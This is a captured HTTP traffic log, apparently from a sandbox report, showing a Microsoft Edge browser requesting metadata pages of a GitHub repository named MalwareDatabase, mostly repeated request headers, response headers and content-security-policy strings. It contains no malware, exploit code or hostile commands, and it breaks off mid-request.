productionresultssa17.blob.core.windows.net/ productionresultssa18.blob.core.windows.net/ productionresultssa19.blob.core.windows.net/ github-production-repository-image-32fea6.s3.amazonaws.com github-production-release-asset-2e65be.s3.amazonaws.com insights.github.com wss://alive.github.com; font-src github.githubassets.com; form-action 'self' github.com gist.github.com copilot-workspace.githubnext.com objects-origin.githubusercontent.com; frame-ancestors 'none'; frame-src viewscreen.githubusercontent.com notebooks.githubusercontent.com; img-src 'self' data: github.githubassets.com media.githubusercontent.com camo.githubusercontent.com identicons.github.com avatars.githubusercontent.com github-cloud.s3.amazonaws.com objects.githubusercontent.com secured-user-images.githubusercontent.com/ user-images.githubusercontent.com/ private-user-images.githubusercontent.com opengraph.githubassets.com github-production-user-asset-6210df.s3.amazonaws.com customer-stories-feed.github.com spotlights-feed.github.com objects-origin.githubusercontent.com *.githubusercontent.com; manifest-src 'self'; media-src github.com user-images.githubusercontent.com/ secured-user-images.githubusercontent.com/ private-user-images.githubusercontent.com github-production-user-asset-6210df.s3.amazonaws.com gist.github.com; script-src github.githubassets.com; style-src 'unsafe-inline' github.githubassets.com; upgrade-insecure-requests; worker-src github.com/assets-cdn/worker/ gist.github.com/assets-cdn/worker/
x-github-request-id: F456:3129D7:19AD55D:1C5972A:66426E86
-
GEThttps://github.com/Endermanch/MalwareDatabase/hovercards/citation/sidebar_partial?tree_name=mastermsedge.exeRemote address:20.26.156.215:443RequestGET /Endermanch/MalwareDatabase/hovercards/citation/sidebar_partial?tree_name=master HTTP/2.0
host: github.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
accept: text/html
dnt: 1
x-requested-with: XMLHttpRequest
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
sec-fetch-site: same-origin
sec-fetch-mode: cors
sec-fetch-dest: empty
referer: https://github.com/Endermanch/MalwareDatabase
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: _gh_sess=yBoYB7qz7%2FTxiWTKMKGdELPcpeXf5icp%2Bxv8Hbus%2FOL9CroBcGsgJuOIeOCIwwOD8msur6KLdpVVUwEypvRLyliws8eI147xTEyn21Bj9VFUSYQKXNgVYKonyVqFIS0F8htt3miOmUSr%2BS%2B31cfUqhpNGL9fKPDQu0FwdFVycMVOA%2BS62KFOOXCl5ttJgIr%2FFm2Iw8%2Fx3dk4vkUWNbffzEuzPTAHQ%2B75OzvgXzgLKGI9Qu3oETLomlK4z7cr8qQ9xhpkWNpJdaaqgBnzchXrEA%3D%3D--ZLTceBrjdVc6vTVm--nWqQ%2FYQ186sc1ms2KcD46w%3D%3D
cookie: _octo=GH1.1.1831426451.1715629700
cookie: logged_in=no
cookie: preferred_color_mode=light
ResponseHTTP/2.0 200
date: Mon, 13 May 2024 19:48:22 GMT
content-type: text/html; charset=utf-8
vary: X-PJAX, X-PJAX-Container, Turbo-Visit, Turbo-Frame, Accept-Encoding, Accept, X-Requested-With
etag: W/"75a11da44c802486bc6f65640aa48a73"
cache-control: max-age=0, private, must-revalidate
strict-transport-security: max-age=31536000; includeSubdomains; preload
x-frame-options: deny
x-content-type-options: nosniff
x-xss-protection: 0
referrer-policy: no-referrer-when-downgrade
content-security-policy: default-src 'none'; base-uri 'self'; child-src github.com/assets-cdn/worker/ gist.github.com/assets-cdn/worker/; connect-src 'self' uploads.github.com www.githubstatus.com collector.github.com raw.githubusercontent.com api.github.com github-cloud.s3.amazonaws.com github-production-repository-file-5c1aeb.s3.amazonaws.com github-production-upload-manifest-file-7fdce7.s3.amazonaws.com github-production-user-asset-6210df.s3.amazonaws.com api.githubcopilot.com objects-origin.githubusercontent.com copilot-proxy.githubusercontent.com/v1/engines/copilot-codex/completions *.actions.githubusercontent.com wss://*.actions.githubusercontent.com productionresultssa0.blob.core.windows.net/ productionresultssa1.blob.core.windows.net/ productionresultssa2.blob.core.windows.net/ productionresultssa3.blob.core.windows.net/ productionresultssa4.blob.core.windows.net/ productionresultssa5.blob.core.windows.net/ productionresultssa6.blob.core.windows.net/ productionresultssa7.blob.core.windows.net/ productionresultssa8.blob.core.windows.net/ productionresultssa9.blob.core.windows.net/ productionresultssa10.blob.core.windows.net/ productionresultssa11.blob.core.windows.net/ productionresultssa12.blob.core.windows.net/ productionresultssa13.blob.core.windows.net/ productionresultssa14.blob.core.windows.net/ productionresultssa15.blob.core.windows.net/ productionresultssa16.blob.core.windows.net/ productionresultssa17.blob.core.windows.net/ productionresultssa18.blob.core.windows.net/ productionresultssa19.blob.core.windows.net/ github-production-repository-image-32fea6.s3.amazonaws.com github-production-release-asset-2e65be.s3.amazonaws.com insights.github.com wss://alive.github.com; font-src github.githubassets.com; form-action 'self' github.com gist.github.com copilot-workspace.githubnext.com objects-origin.githubusercontent.com; frame-ancestors 'none'; frame-src viewscreen.githubusercontent.com notebooks.githubusercontent.com; img-src 'self' data: github.githubassets.com media.githubusercontent.com camo.githubusercontent.com identicons.github.com avatars.githubusercontent.com github-cloud.s3.amazonaws.com objects.githubusercontent.com secured-user-images.githubusercontent.com/ user-images.githubusercontent.com/ private-user-images.githubusercontent.com opengraph.githubassets.com github-production-user-asset-6210df.s3.amazonaws.com customer-stories-feed.github.com spotlights-feed.github.com objects-origin.githubusercontent.com *.githubusercontent.com; manifest-src 'self'; media-src github.com user-images.githubusercontent.com/ secured-user-images.githubusercontent.com/ private-user-images.githubusercontent.com github-production-user-asset-6210df.s3.amazonaws.com gist.github.com; script-src github.githubassets.com; style-src 'unsafe-inline' github.githubassets.com; upgrade-insecure-requests; worker-src github.com/assets-cdn/worker/ gist.github.com/assets-cdn/worker/
content-encoding: gzip
x-html-safe: 9ff54e1eaefcf1dab87afdeb170810c74ba72981fa51e817eb112ba22a3d04bb
accept-ranges: bytes
content-length: 33
x-github-request-id: F456:3129D7:19AD55D:1C59729:66426E86
-
Remote address:20.26.156.215:443RequestGET /Endermanch/MalwareDatabase/used_by_list HTTP/2.0
host: github.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
accept: text/fragment+html
dnt: 1
x-requested-with: XMLHttpRequest
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
sec-fetch-site: same-origin
sec-fetch-mode: cors
sec-fetch-dest: empty
referer: https://github.com/Endermanch/MalwareDatabase
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: _gh_sess=yBoYB7qz7%2FTxiWTKMKGdELPcpeXf5icp%2Bxv8Hbus%2FOL9CroBcGsgJuOIeOCIwwOD8msur6KLdpVVUwEypvRLyliws8eI147xTEyn21Bj9VFUSYQKXNgVYKonyVqFIS0F8htt3miOmUSr%2BS%2B31cfUqhpNGL9fKPDQu0FwdFVycMVOA%2BS62KFOOXCl5ttJgIr%2FFm2Iw8%2Fx3dk4vkUWNbffzEuzPTAHQ%2B75OzvgXzgLKGI9Qu3oETLomlK4z7cr8qQ9xhpkWNpJdaaqgBnzchXrEA%3D%3D--ZLTceBrjdVc6vTVm--nWqQ%2FYQ186sc1ms2KcD46w%3D%3D
cookie: _octo=GH1.1.1831426451.1715629700
cookie: logged_in=no
cookie: preferred_color_mode=light
ResponseHTTP/2.0 200
date: Mon, 13 May 2024 19:48:13 GMT
vary: X-PJAX, X-PJAX-Container, Turbo-Visit, Turbo-Frame, Accept-Encoding, Accept, X-Requested-With
cache-control: max-age=604800, public
etag: W/"c75e05794d72230a695e880f1a6c83a4"
strict-transport-security: max-age=31536000; includeSubdomains; preload
x-frame-options: deny
x-content-type-options: nosniff
x-xss-protection: 0
referrer-policy: origin-when-cross-origin, strict-origin-when-cross-origin
content-security-policy: default-src 'none'; base-uri 'self'; child-src github.com/assets-cdn/worker/ gist.github.com/assets-cdn/worker/; connect-src 'self' uploads.github.com www.githubstatus.com collector.github.com raw.githubusercontent.com api.github.com github-cloud.s3.amazonaws.com github-production-repository-file-5c1aeb.s3.amazonaws.com github-production-upload-manifest-file-7fdce7.s3.amazonaws.com github-production-user-asset-6210df.s3.amazonaws.com api.githubcopilot.com objects-origin.githubusercontent.com copilot-proxy.githubusercontent.com/v1/engines/copilot-codex/completions *.actions.githubusercontent.com wss://*.actions.githubusercontent.com productionresultssa0.blob.core.windows.net/ productionresultssa1.blob.core.windows.net/ productionresultssa2.blob.core.windows.net/ productionresultssa3.blob.core.windows.net/ productionresultssa4.blob.core.windows.net/ productionresultssa5.blob.core.windows.net/ productionresultssa6.blob.core.windows.net/ productionresultssa7.blob.core.windows.net/ productionresultssa8.blob.core.windows.net/ productionresultssa9.blob.core.windows.net/ productionresultssa10.blob.core.windows.net/ productionresultssa11.blob.core.windows.net/ productionresultssa12.blob.core.windows.net/ productionresultssa13.blob.core.windows.net/ productionresultssa14.blob.core.windows.net/ productionresultssa15.blob.core.windows.net/ productionresultssa16.blob.core.windows.net/ productionresultssa17.blob.core.windows.net/ productionresultssa18.blob.core.windows.net/ productionresultssa19.blob.core.windows.net/ github-production-repository-image-32fea6.s3.amazonaws.com github-production-release-asset-2e65be.s3.amazonaws.com insights.github.com wss://alive.github.com; font-src github.githubassets.com; form-action 'self' github.com gist.github.com copilot-workspace.githubnext.com objects-origin.githubusercontent.com; frame-ancestors 'none'; frame-src viewscreen.githubusercontent.com notebooks.githubusercontent.com; img-src 'self' data: github.githubassets.com media.githubusercontent.com camo.githubusercontent.com identicons.github.com avatars.githubusercontent.com github-cloud.s3.amazonaws.com objects.githubusercontent.com secured-user-images.githubusercontent.com/ user-images.githubusercontent.com/ private-user-images.githubusercontent.com opengraph.githubassets.com github-production-user-asset-6210df.s3.amazonaws.com customer-stories-feed.github.com spotlights-feed.github.com objects-origin.githubusercontent.com *.githubusercontent.com; manifest-src 'self'; media-src github.com user-images.githubusercontent.com/ secured-user-images.githubusercontent.com/ private-user-images.githubusercontent.com github-production-user-asset-6210df.s3.amazonaws.com gist.github.com; script-src github.githubassets.com; style-src 'unsafe-inline' github.githubassets.com; upgrade-insecure-requests; worker-src github.com/assets-cdn/worker/ gist.github.com/assets-cdn/worker/
content-type: application/manifest+json; charset=utf-8
content-encoding: gzip
accept-ranges: bytes
content-length: 474
x-github-request-id: F456:3129D7:19AD573:1C59747:66426E86
-
Remote address:20.26.156.215:443RequestGET /Endermanch/MalwareDatabase/refs?type=branch HTTP/2.0
host: github.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
accept: application/json
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
sec-fetch-site: same-origin
sec-fetch-mode: cors
sec-fetch-dest: empty
referer: https://github.com/Endermanch/MalwareDatabase
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: _gh_sess=yBoYB7qz7%2FTxiWTKMKGdELPcpeXf5icp%2Bxv8Hbus%2FOL9CroBcGsgJuOIeOCIwwOD8msur6KLdpVVUwEypvRLyliws8eI147xTEyn21Bj9VFUSYQKXNgVYKonyVqFIS0F8htt3miOmUSr%2BS%2B31cfUqhpNGL9fKPDQu0FwdFVycMVOA%2BS62KFOOXCl5ttJgIr%2FFm2Iw8%2Fx3dk4vkUWNbffzEuzPTAHQ%2B75OzvgXzgLKGI9Qu3oETLomlK4z7cr8qQ9xhpkWNpJdaaqgBnzchXrEA%3D%3D--ZLTceBrjdVc6vTVm--nWqQ%2FYQ186sc1ms2KcD46w%3D%3D
cookie: _octo=GH1.1.1831426451.1715629700
cookie: logged_in=no
cookie: preferred_color_mode=light
ResponseHTTP/2.0 200
date: Mon, 13 May 2024 19:48:22 GMT
content-type: text/plain; charset=utf-8
vary: X-PJAX, X-PJAX-Container, Turbo-Visit, Turbo-Frame, Accept-Encoding, Accept, X-Requested-With
cache-control: no-cache
strict-transport-security: max-age=31536000; includeSubdomains; preload
x-frame-options: deny
x-content-type-options: nosniff
x-xss-protection: 0
referrer-policy: no-referrer-when-downgrade
content-security-policy: default-src 'none'; base-uri 'self'; child-src github.com/assets-cdn/worker/ gist.github.com/assets-cdn/worker/; connect-src 'self' uploads.github.com www.githubstatus.com collector.github.com raw.githubusercontent.com api.github.com github-cloud.s3.amazonaws.com github-production-repository-file-5c1aeb.s3.amazonaws.com github-production-upload-manifest-file-7fdce7.s3.amazonaws.com github-production-user-asset-6210df.s3.amazonaws.com api.githubcopilot.com objects-origin.githubusercontent.com copilot-proxy.githubusercontent.com/v1/engines/copilot-codex/completions *.actions.githubusercontent.com wss://*.actions.githubusercontent.com productionresultssa0.blob.core.windows.net/ productionresultssa1.blob.core.windows.net/ productionresultssa2.blob.core.windows.net/ productionresultssa3.blob.core.windows.net/ productionresultssa4.blob.core.windows.net/ productionresultssa5.blob.core.windows.net/ productionresultssa6.blob.core.windows.net/ productionresultssa7.blob.core.windows.net/ productionresultssa8.blob.core.windows.net/ productionresultssa9.blob.core.windows.net/ productionresultssa10.blob.core.windows.net/ productionresultssa11.blob.core.windows.net/ productionresultssa12.blob.core.windows.net/ productionresultssa13.blob.core.windows.net/ productionresultssa14.blob.core.windows.net/ productionresultssa15.blob.core.windows.net/ productionresultssa16.blob.core.windows.net/ productionresultssa17.blob.core.windows.net/ productionresultssa18.blob.core.windows.net/ productionresultssa19.blob.core.windows.net/ github-production-repository-image-32fea6.s3.amazonaws.com github-production-release-asset-2e65be.s3.amazonaws.com insights.github.com wss://alive.github.com; font-src github.githubassets.com; form-action 'self' github.com gist.github.com copilot-workspace.githubnext.com objects-origin.githubusercontent.com; frame-ancestors 'none'; frame-src viewscreen.githubusercontent.com notebooks.githubusercontent.com; img-src 'self' data: github.githubassets.com media.githubusercontent.com camo.githubusercontent.com identicons.github.com avatars.githubusercontent.com github-cloud.s3.amazonaws.com objects.githubusercontent.com secured-user-images.githubusercontent.com/ user-images.githubusercontent.com/ private-user-images.githubusercontent.com opengraph.githubassets.com github-production-user-asset-6210df.s3.amazonaws.com customer-stories-feed.github.com spotlights-feed.github.com objects-origin.githubusercontent.com *.githubusercontent.com; manifest-src 'self'; media-src github.com user-images.githubusercontent.com/ secured-user-images.githubusercontent.com/ private-user-images.githubusercontent.com github-production-user-asset-6210df.s3.amazonaws.com gist.github.com; script-src github.githubassets.com; style-src 'unsafe-inline' github.githubassets.com; upgrade-insecure-requests; worker-src github.com/assets-cdn/worker/ gist.github.com/assets-cdn/worker/
content-encoding: gzip
accept-ranges: bytes
content-length: 20
x-github-request-id: F456:3129D7:19AD55D:1C5972B:66426E86
-
Remote address:20.26.156.215:443RequestGET /Endermanch/MalwareDatabase/latest-commit/master HTTP/2.0
host: github.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
content-type: application/json
accept: application/json
x-requested-with: XMLHttpRequest
github-verified-fetch: true
sec-fetch-site: same-origin
sec-fetch-mode: cors
sec-fetch-dest: empty
referer: https://github.com/Endermanch/MalwareDatabase
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: _gh_sess=yBoYB7qz7%2FTxiWTKMKGdELPcpeXf5icp%2Bxv8Hbus%2FOL9CroBcGsgJuOIeOCIwwOD8msur6KLdpVVUwEypvRLyliws8eI147xTEyn21Bj9VFUSYQKXNgVYKonyVqFIS0F8htt3miOmUSr%2BS%2B31cfUqhpNGL9fKPDQu0FwdFVycMVOA%2BS62KFOOXCl5ttJgIr%2FFm2Iw8%2Fx3dk4vkUWNbffzEuzPTAHQ%2B75OzvgXzgLKGI9Qu3oETLomlK4z7cr8qQ9xhpkWNpJdaaqgBnzchXrEA%3D%3D--ZLTceBrjdVc6vTVm--nWqQ%2FYQ186sc1ms2KcD46w%3D%3D
cookie: _octo=GH1.1.1831426451.1715629700
cookie: logged_in=no
cookie: preferred_color_mode=light
ResponseHTTP/2.0 200
date: Mon, 13 May 2024 19:48:22 GMT
content-type: text/html; charset=utf-8
vary: X-PJAX, X-PJAX-Container, Turbo-Visit, Turbo-Frame, Accept-Encoding, Accept, X-Requested-With
etag: W/"8902c7088699d5c25402933819980cd9"
cache-control: max-age=0, private, must-revalidate
strict-transport-security: max-age=31536000; includeSubdomains; preload
x-frame-options: deny
x-content-type-options: nosniff
x-xss-protection: 0
referrer-policy: no-referrer-when-downgrade
content-security-policy: default-src 'none'; base-uri 'self'; child-src github.com/assets-cdn/worker/ gist.github.com/assets-cdn/worker/; connect-src 'self' uploads.github.com www.githubstatus.com collector.github.com raw.githubusercontent.com api.github.com github-cloud.s3.amazonaws.com github-production-repository-file-5c1aeb.s3.amazonaws.com github-production-upload-manifest-file-7fdce7.s3.amazonaws.com github-production-user-asset-6210df.s3.amazonaws.com api.githubcopilot.com objects-origin.githubusercontent.com copilot-proxy.githubusercontent.com/v1/engines/copilot-codex/completions *.actions.githubusercontent.com wss://*.actions.githubusercontent.com productionresultssa0.blob.core.windows.net/ productionresultssa1.blob.core.windows.net/ productionresultssa2.blob.core.windows.net/ productionresultssa3.blob.core.windows.net/ productionresultssa4.blob.core.windows.net/ productionresultssa5.blob.core.windows.net/ productionresultssa6.blob.core.windows.net/ productionresultssa7.blob.core.windows.net/ productionresultssa8.blob.core.windows.net/ productionresultssa9.blob.core.windows.net/ productionresultssa10.blob.core.windows.net/ productionresultssa11.blob.core.windows.net/ productionresultssa12.blob.core.windows.net/ productionresultssa13.blob.core.windows.net/ productionresultssa14.blob.core.windows.net/ productionresultssa15.blob.core.windows.net/ productionresultssa16.blob.core.windows.net/ productionresultssa17.blob.core.windows.net/ productionresultssa18.blob.core.windows.net/ productionresultssa19.blob.core.windows.net/ github-production-repository-image-32fea6.s3.amazonaws.com github-production-release-asset-2e65be.s3.amazonaws.com insights.github.com wss://alive.github.com; font-src github.githubassets.com; form-action 'self' github.com gist.github.com copilot-workspace.githubnext.com objects-origin.githubusercontent.com; frame-ancestors 'none'; frame-src viewscreen.githubusercontent.com notebooks.githubusercontent.com; img-src 'self' data: github.githubassets.com media.githubusercontent.com camo.githubusercontent.com identicons.github.com avatars.githubusercontent.com github-cloud.s3.amazonaws.com objects.githubusercontent.com secured-user-images.githubusercontent.com/ user-images.githubusercontent.com/ private-user-images.githubusercontent.com opengraph.githubassets.com github-production-user-asset-6210df.s3.amazonaws.com customer-stories-feed.github.com spotlights-feed.github.com objects-origin.githubusercontent.com *.githubusercontent.com; manifest-src 'self'; media-src github.com user-images.githubusercontent.com/ secured-user-images.githubusercontent.com/ private-user-images.githubusercontent.com github-production-user-asset-6210df.s3.amazonaws.com gist.github.com; script-src github.githubassets.com; style-src 'unsafe-inline' github.githubassets.com; upgrade-insecure-requests; worker-src github.com/assets-cdn/worker/ gist.github.com/assets-cdn/worker/
content-encoding: gzip
x-html-safe: 9ff54e1eaefcf1dab87afdeb170810c74ba72981fa51e817eb112ba22a3d04bb
accept-ranges: bytes
content-length: 95
x-github-request-id: F456:3129D7:19AD563:1C5973B:66426E86
-
Remote address:20.26.156.215:443RequestGET /Endermanch/MalwareDatabase/tree-commit-info/master HTTP/2.0
host: github.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
content-type: application/json
accept: application/json
x-requested-with: XMLHttpRequest
github-verified-fetch: true
sec-fetch-site: same-origin
sec-fetch-mode: cors
sec-fetch-dest: empty
referer: https://github.com/Endermanch/MalwareDatabase
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: _gh_sess=yBoYB7qz7%2FTxiWTKMKGdELPcpeXf5icp%2Bxv8Hbus%2FOL9CroBcGsgJuOIeOCIwwOD8msur6KLdpVVUwEypvRLyliws8eI147xTEyn21Bj9VFUSYQKXNgVYKonyVqFIS0F8htt3miOmUSr%2BS%2B31cfUqhpNGL9fKPDQu0FwdFVycMVOA%2BS62KFOOXCl5ttJgIr%2FFm2Iw8%2Fx3dk4vkUWNbffzEuzPTAHQ%2B75OzvgXzgLKGI9Qu3oETLomlK4z7cr8qQ9xhpkWNpJdaaqgBnzchXrEA%3D%3D--ZLTceBrjdVc6vTVm--nWqQ%2FYQ186sc1ms2KcD46w%3D%3D
cookie: _octo=GH1.1.1831426451.1715629700
cookie: logged_in=no
cookie: preferred_color_mode=light
ResponseHTTP/2.0 200
date: Mon, 13 May 2024 19:48:22 GMT
content-type: text/html; charset=utf-8
vary: X-PJAX, X-PJAX-Container, Turbo-Visit, Turbo-Frame, Accept-Encoding, Accept, X-Requested-With
etag: W/"56a3b41b3adb53ca7fce5703eb10dacf"
cache-control: max-age=0, private, must-revalidate
strict-transport-security: max-age=31536000; includeSubdomains; preload
x-frame-options: deny
x-content-type-options: nosniff
x-xss-protection: 0
referrer-policy: no-referrer-when-downgrade
content-security-policy: default-src 'none'; base-uri 'self'; child-src github.com/assets-cdn/worker/ gist.github.com/assets-cdn/worker/; connect-src 'self' uploads.github.com www.githubstatus.com collector.github.com raw.githubusercontent.com api.github.com github-cloud.s3.amazonaws.com github-production-repository-file-5c1aeb.s3.amazonaws.com github-production-upload-manifest-file-7fdce7.s3.amazonaws.com github-production-user-asset-6210df.s3.amazonaws.com api.githubcopilot.com objects-origin.githubusercontent.com copilot-proxy.githubusercontent.com/v1/engines/copilot-codex/completions *.actions.githubusercontent.com wss://*.actions.githubusercontent.com productionresultssa0.blob.core.windows.net/ productionresultssa1.blob.core.windows.net/ productionresultssa2.blob.core.windows.net/ productionresultssa3.blob.core.windows.net/ productionresultssa4.blob.core.windows.net/ productionresultssa5.blob.core.windows.net/ productionresultssa6.blob.core.windows.net/ productionresultssa7.blob.core.windows.net/ productionresultssa8.blob.core.windows.net/ productionresultssa9.blob.core.windows.net/ productionresultssa10.blob.core.windows.net/ productionresultssa11.blob.core.windows.net/ productionresultssa12.blob.core.windows.net/ productionresultssa13.blob.core.windows.net/ productionresultssa14.blob.core.windows.net/ productionresultssa15.blob.core.windows.net/ productionresultssa16.blob.core.windows.net/ productionresultssa17.blob.core.windows.net/ productionresultssa18.blob.core.windows.net/ productionresultssa19.blob.core.windows.net/ github-production-repository-image-32fea6.s3.amazonaws.com github-production-release-asset-2e65be.s3.amazonaws.com insights.github.com wss://alive.github.com; font-src github.githubassets.com; form-action 'self' github.com gist.github.com copilot-workspace.githubnext.com objects-origin.githubusercontent.com; frame-ancestors 'none'; frame-src viewscreen.githubusercontent.com notebooks.githubusercontent.com; img-src 'self' data: github.githubassets.com media.githubusercontent.com camo.githubusercontent.com identicons.github.com avatars.githubusercontent.com github-cloud.s3.amazonaws.com objects.githubusercontent.com secured-user-images.githubusercontent.com/ user-images.githubusercontent.com/ private-user-images.githubusercontent.com opengraph.githubassets.com github-production-user-asset-6210df.s3.amazonaws.com customer-stories-feed.github.com spotlights-feed.github.com objects-origin.githubusercontent.com *.githubusercontent.com; manifest-src 'self'; media-src github.com user-images.githubusercontent.com/ secured-user-images.githubusercontent.com/ private-user-images.githubusercontent.com github-production-user-asset-6210df.s3.amazonaws.com gist.github.com; script-src github.githubassets.com; style-src 'unsafe-inline' github.githubassets.com; upgrade-insecure-requests; worker-src github.com/assets-cdn/worker/ gist.github.com/assets-cdn/worker/
content-encoding: gzip
x-html-safe: 9ff54e1eaefcf1dab87afdeb170810c74ba72981fa51e817eb112ba22a3d04bb
accept-ranges: bytes
content-length: 97
x-github-request-id: F456:3129D7:19AD563:1C5973A:66426E86
-
Remote address:20.26.156.215:443RequestGET /Endermanch/MalwareDatabase/branch-count HTTP/2.0
host: github.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
dnt: 1
x-requested-with: XMLHttpRequest
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
github-verified-fetch: true
accept: */*
sec-fetch-site: same-origin
sec-fetch-mode: cors
sec-fetch-dest: empty
referer: https://github.com/Endermanch/MalwareDatabase
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: _gh_sess=yBoYB7qz7%2FTxiWTKMKGdELPcpeXf5icp%2Bxv8Hbus%2FOL9CroBcGsgJuOIeOCIwwOD8msur6KLdpVVUwEypvRLyliws8eI147xTEyn21Bj9VFUSYQKXNgVYKonyVqFIS0F8htt3miOmUSr%2BS%2B31cfUqhpNGL9fKPDQu0FwdFVycMVOA%2BS62KFOOXCl5ttJgIr%2FFm2Iw8%2Fx3dk4vkUWNbffzEuzPTAHQ%2B75OzvgXzgLKGI9Qu3oETLomlK4z7cr8qQ9xhpkWNpJdaaqgBnzchXrEA%3D%3D--ZLTceBrjdVc6vTVm--nWqQ%2FYQ186sc1ms2KcD46w%3D%3D
cookie: _octo=GH1.1.1831426451.1715629700
cookie: logged_in=no
cookie: preferred_color_mode=light
ResponseHTTP/2.0 200
date: Mon, 13 May 2024 19:48:22 GMT
content-type: application/json; charset=utf-8
vary: X-PJAX, X-PJAX-Container, Turbo-Visit, Turbo-Frame, Accept-Encoding, Accept, X-Requested-With
etag: W/"27ad9379f8d0879f6d62fe8ef65a2c3d"
cache-control: max-age=0, private, must-revalidate
strict-transport-security: max-age=31536000; includeSubdomains; preload
x-frame-options: deny
x-content-type-options: nosniff
x-xss-protection: 0
referrer-policy: no-referrer-when-downgrade
content-security-policy: default-src 'none'; base-uri 'self'; child-src github.com/assets-cdn/worker/ gist.github.com/assets-cdn/worker/; connect-src 'self' uploads.github.com www.githubstatus.com collector.github.com raw.githubusercontent.com api.github.com github-cloud.s3.amazonaws.com github-production-repository-file-5c1aeb.s3.amazonaws.com github-production-upload-manifest-file-7fdce7.s3.amazonaws.com github-production-user-asset-6210df.s3.amazonaws.com api.githubcopilot.com objects-origin.githubusercontent.com copilot-proxy.githubusercontent.com/v1/engines/copilot-codex/completions *.actions.githubusercontent.com wss://*.actions.githubusercontent.com productionresultssa0.blob.core.windows.net/ productionresultssa1.blob.core.windows.net/ productionresultssa2.blob.core.windows.net/ productionresultssa3.blob.core.windows.net/ productionresultssa4.blob.core.windows.net/ productionresultssa5.blob.core.windows.net/ productionresultssa6.blob.core.windows.net/ productionresultssa7.blob.core.windows.net/ productionresultssa8.blob.core.windows.net/ productionresultssa9.blob.core.windows.net/ productionresultssa10.blob.core.windows.net/ productionresultssa11.blob.core.windows.net/ productionresultssa12.blob.core.windows.net/ productionresultssa13.blob.core.windows.net/ productionresultssa14.blob.core.windows.net/ productionresultssa15.blob.core.windows.net/ productionresultssa16.blob.core.windows.net/ productionresultssa17.blob.core.windows.net/ productionresultssa18.blob.core.windows.net/ productionresultssa19.blob.core.windows.net/ github-production-repository-image-32fea6.s3.amazonaws.com github-production-release-asset-2e65be.s3.amazonaws.com insights.github.com wss://alive.github.com; font-src github.githubassets.com; form-action 'self' github.com gist.github.com copilot-workspace.githubnext.com objects-origin.githubusercontent.com; frame-ancestors 'none'; frame-src viewscreen.githubusercontent.com notebooks.githubusercontent.com; img-src 'self' data: github.githubassets.com media.githubusercontent.com camo.githubusercontent.com identicons.github.com avatars.githubusercontent.com github-cloud.s3.amazonaws.com objects.githubusercontent.com secured-user-images.githubusercontent.com/ user-images.githubusercontent.com/ private-user-images.githubusercontent.com opengraph.githubassets.com github-production-user-asset-6210df.s3.amazonaws.com customer-stories-feed.github.com spotlights-feed.github.com objects-origin.githubusercontent.com *.githubusercontent.com; manifest-src 'self'; media-src github.com user-images.githubusercontent.com/ secured-user-images.githubusercontent.com/ private-user-images.githubusercontent.com github-production-user-asset-6210df.s3.amazonaws.com gist.github.com; script-src github.githubassets.com; style-src 'unsafe-inline' github.githubassets.com; upgrade-insecure-requests; worker-src github.com/assets-cdn/worker/ gist.github.com/assets-cdn/worker/
content-encoding: gzip
accept-ranges: bytes
content-length: 84
x-github-request-id: F456:3129D7:19AD563:1C59736:66426E86
-
Remote address:20.26.156.215:443RequestGET /Endermanch/MalwareDatabase/tag-count HTTP/2.0
host: github.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
dnt: 1
x-requested-with: XMLHttpRequest
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
github-verified-fetch: true
accept: */*
sec-fetch-site: same-origin
sec-fetch-mode: cors
sec-fetch-dest: empty
referer: https://github.com/Endermanch/MalwareDatabase
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
